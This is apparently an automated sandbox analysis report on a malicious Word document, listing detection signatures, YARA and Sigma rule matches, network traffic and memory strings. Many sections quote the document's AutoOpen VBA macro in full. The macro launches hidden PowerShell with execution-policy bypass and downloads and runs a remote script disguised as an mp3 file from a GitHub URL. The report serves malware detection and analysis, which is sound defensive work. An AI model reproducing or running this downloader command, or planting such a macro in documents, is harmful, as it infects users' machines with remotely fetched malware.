Loading ...

Play interactive tourEdit tour

Windows Analysis Report RfORrHIRNe

Overview

General Information

Sample Name:RfORrHIRNe (renamed file extension from none to doc)
Analysis ID:515215
MD5:955d5d2855b291a3cf1fc6655bbbbb79
SHA1:b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256:63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
Infos:

Most interesting Screenshot:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2096 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2432 cmdline: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
RfORrHIRNe.docPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x72c7:$s1: Powershell.exe
  • 0x72f1:$s2: Bypass
RfORrHIRNe.docPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x72e0:$sb1: -W Hidden
  • 0x72d5:$sc1: -NoP
  • 0x72da:$sd1: -NonI
  • 0x72ea:$se2: -Exec Bypass
  • 0x72ea:$se4: -Exec Bypass

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmpPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x1047:$s1: Powershell.exe
  • 0x1071:$s2: Bypass
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x1060:$sb1: -W Hidden
  • 0x1055:$sc1: -NoP
  • 0x105a:$sd1: -NonI
  • 0x106a:$se2: -Exec Bypass
  • 0x106a:$se4: -Exec Bypass
C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMPPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x2c33:$s1: Powershell.exe
  • 0x2c5d:$s2: Bypass
C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMPPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x2c4c:$sb1: -W Hidden
  • 0x2c41:$sc1: -NoP
  • 0x2c46:$sd1: -NonI
  • 0x2c56:$se2: -Exec Bypass
  • 0x2c56:$se4: -Exec Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x3039:$sb1: -W Hidden
  • 0x302e:$sc1: -NoP
  • 0x3033:$sd1: -NonI
  • 0x3043:$se2: -Exec Bypass
  • 0x3043:$se4: -Exec Bypass

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432
Sigma detected: PowerShell Download from URLShow sources
Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2096, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2432

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: RfORrHIRNe.docVirustotal: Detection: 49%Perma Link
Antivirus / Scanner detection for submitted sampleShow sources
Source: RfORrHIRNe.docAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMPAvira: detection malicious, Label: HEUR/Macro.Downloader.MRQR.Gen
Machine Learning detection for sampleShow sources
Source: RfORrHIRNe.docJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.419412789.0000000002827000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficDNS query: name: github.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 140.82.121.3:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 140.82.121.3:443
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000001.00000002.418391747.000000000031B000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000001.00000002.424410847.000000001B7D1000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmpString found in binary or memory: http://github.co
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmpString found in binary or memory: http://github.com
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36
Source: powershell.exe, 00000001.00000002.422084505.0000000003603000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3PE
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3PE
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3PE
Source: RfORrHIRNe.doc, ~DFA094A62AA4BA8959.TMP.0.drString found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3PE
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000001.00000002.424410847.000000001B7D1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000001.00000002.418391747.000000000031B000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000001.00000002.418738530.0000000002360000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000001.00000002.425190058.000000001CEB7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000001.00000002.418333433.000000000028E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://wT
Source: powershell.exe, 00000001.00000002.424943589.000000001CCD0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://github.c
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/ra
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3PE
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://notebooks.githubusercontent.com
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubuserco
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.419847899.0000000002CAF000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://render.githubusercontent.com
Source: powershell.exe, 00000001.00000002.424530325.000000001B80C000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000001.00000002.422212636.00000000036F7000.00000004.00000001.sdmpString found in binary or memory: https://viewscreen.githubusercontent.com
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BC62BE70-F984-485F-A938-51B492D77752}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: github.com
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: RfORrHIRNe.docOLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function Autoopen, String powershell: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE, VBA macro line: JbxHook_Shell_1_ 3, ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: RfORrHIRNe.doc, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, type: DROPPEDMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, type: DROPPEDMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drOLE indicator application name: unknown
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE indicator application name: unknown
Source: RfORrHIRNe.docOLE, VBA macro line: Sub Autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module NewMacros, Function Autoopen
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE, VBA macro line: Sub Autoopen()
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp.0.drOLE indicator has summary info: false
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE indicator has summary info: false
Source: RfORrHIRNe.docOLE indicator, VBA macros: true
Source: ~DFA094A62AA4BA8959.TMP.0.drOLE indicator, VBA macros: true
Source: RfORrHIRNe.docVirustotal: Detection: 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................Sj.... #..............................}..v.....#......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............P.Sj....P.W.............................}..v....h*......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................Sj.... +..............................}..v.....+......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............P.Sj....P.W.............................}..v.....1......0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................Sj.....1..............................}..v....@2......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.2. .c.h.a.r.:.1.8...............}..v....P6......0.................W.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................Sj.....7..............................}..v.....7......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............P.Sj....P.W.............................}..v....P>......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................Sj.....?..............................}..v.....?......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.t.F.i.l.e. .".t.e.m.p.5.4.6.8.5.".............}..v.....C......0.................W.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................Sj....PD..............................}..v.....D......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............P.Sj....P.W.............................}..v.....K......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................Sj....PL..............................}..v.....L......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......Q......0.................W.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................Sj.....Q..............................}..v....8R......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................P.Sj....P.W.............................}..v....xW......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................Sj....0X..............................}..v.....X......0.................W.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......P.Sj....P.W.............................}..v....@\......0.................W.............................
